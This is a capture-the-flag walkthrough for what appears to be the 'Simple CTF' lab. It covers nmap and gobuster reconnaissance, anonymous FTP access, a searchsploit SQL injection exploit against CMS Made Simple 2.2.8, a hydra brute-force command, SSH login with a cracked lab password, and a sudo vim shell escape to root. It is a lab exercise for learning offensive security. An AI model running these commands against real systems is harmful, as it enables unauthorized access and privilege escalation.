Simple CTF

Reconnaissance

Lets start with a initial nmap scan to find open ports

nmap -Pn 10.10.221.224

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 21,80,2222

  • (-oN nmap): Saving it into a files called nmap

nmap -sC -sV -p 21,80,2222 -oN nmap 10.10.221.224

With this information we can answer the first 2 questions

Enumeration

Port 21

Lets start enumerating FTP (Port 21) as we have anonymous login allowed.

ftp 10.10.221.224 

After listing the contents, we can see that there is a directory called puband inside is a file called ForMitch.txt. Let us transfer that to our machine using the command get.

get ForMitch.txt

After reading the contents of the file we transferred, we can understand that Mitch set the password for the system user and the password is weak.

cat ForMitch.txt

Port 80

Lets visit the website.

It a default apache2 ubuntu page, so let us visit robots.txt as we see something of interest related to it in our nmap scan.

We can see that there is a directory called /openemr-5_0_1_3, lets go visit it.

And is not found, well, now lets try finding hidden directories using a tool called Gobuster.

Command Breakdown:

  • (-w): Specifying wordlist

  • (-u): Specifying URL

gobuster dir -w /usr/share/wordlists/dirbuster/common.txt -u http://10.10.221.224

The directory called /simple looks interesting, so lets go visit it.

Its a CMS made simple application and scrolling down a bit, we can see the version of it.

Lets look for exploits on it using searchsploit

searchsploit cms made simple 2.2.8

Looks like a SQL Injection exploit, lets use this to exploit this machine.

Exploitation

Searching this on exploit-db gives us the answers to questions 3 and 4

Lets download the exploit.

searchsploit -m php/webapps/46635.py

Now lets launch it against the server, but first we need to do some changes to the script as we are going to use python3 to launch this exploit. First we need to add parenthesis around the print commands

Before:

After:

Before:

After:

Before:

After:

Now we can run the exploit with some options, like the target URL (-u), a wordlists to crack the password (-w) and the option for telling the exploit to crack the password (-c), all mentioned in the exploit.

python3 46635.py -u http://10.10.221.224/simple -w /usr/share/wordlists/rockyou.txt -c

We found the password: secret. Sometimes this exploit does not work, so we can also try cracking the password using the tool called hydra.

hydra -l mitch -P /usr/share/wordlists/rockyou.txt 10.10.221.224 http-post-form "/simple/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect"

And now we can ssh into the machine using these credentials.

ssh mitch@10.10.221.224 -p 2222

Privilege Escalation

For privilege escalation, one of the first commands we use is sudo -l, which tells us what we are allowed to run on the machine.

sudo -l

We are allowed to run /usr/bin/vim as root, so what we can do is visit GTFOBins which is a site with commands that will help us escalate our privileges.

Search for vim on the site and look for sudo as we are allowed to run /usr/bin/vim as root.

After you type the first command, you are now root.

sudo vim -c ':!/bin/sh'

Last updated